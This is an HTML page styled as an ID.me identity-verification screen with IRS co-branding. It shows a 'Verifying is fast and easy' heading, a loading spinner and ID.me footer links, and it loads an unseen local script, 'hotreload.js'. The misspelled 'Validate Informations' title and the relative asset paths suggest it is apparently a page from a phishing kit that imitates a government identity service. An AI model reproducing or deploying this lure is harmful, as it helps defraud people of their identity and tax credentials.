<!DOCTYPE html>
<html dir="ltr" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><style>body {transition: opacity ease-in 0.2s; } 
body[unresolved] {opacity: 0; display: block; overflow: hidden; position: relative; } 
</style>
<title>
Validate Informations
</title>

	
<meta content="IE=edge" http-equiv="X-UA-Compatible">
<meta content="One Identity. One Wallet." name="description">
<meta content="" name="keywords">
<meta content="noodp" name="robots">
<meta content="width=device-width, initial-scale=1, minimum-scale=1" name="viewport">
<meta content="noindex" name="robots">
<link rel="icon" type="image/png" href="img/favicon.ico">

<link rel="stylesheet" media="all" href="img/style.css">
    <link rel="stylesheet" href="./css/style.css" />
<script type="text/javascript" src="hotreload.js"></script>
<body>
<div class="page-container" data-role="page-container">
<div class="container">
<div class="content-container m_identity step-options" data-component="Components.PageTitle">
<div class="form-header">
<div class="form-header-content" role="banner">
<div class="partner">
<div class="c_icon m_idme">
<img alt=""src="img/id.svg">
</div>
<div class="c_icon m_addition">
<img alt="" src="img/icon-addition.svg">
</div>
<div class="c_icon m_consumer-logo">
<img alt="ID.me with The Internal Revenue Service" src="img/large.png">
</div>
</div>
</div>
</div>

	
	<main class="form-container shared_structure">
<div class="heading-affinity heading-identity">
</div>
<h1 class="heading" id="sr_page_title">Verifying is fast and easy</h1>

<div class="verification-options-container">

        <div class="spinner-3"></div>
        
	</div>
</main>
</div>

<aside aria-label="Select Language" class="language">
<div class="language-selection" data-component="Components.Language">
<a class="language-selection-toggle" href="#">English</a>

</div>
</aside>

<footer class="footer">
<nav aria-label="Footer" class="footer__links">
<ul class="footer__list">
<li class="footer__list-item"><a target="_blank" class="footer__link" href="about">What is ID.me?</a></li>
<li class="footer__list-item"><a target="_blank" class="footer__link" href="terms">Terms of Service</a></li>
<li class="footer__list-item"><a target="_blank" class="footer__link" href="privacy">Privacy Policy</a></li>
</ul>
</nav>
</footer>

</div>
</div>
</body></html>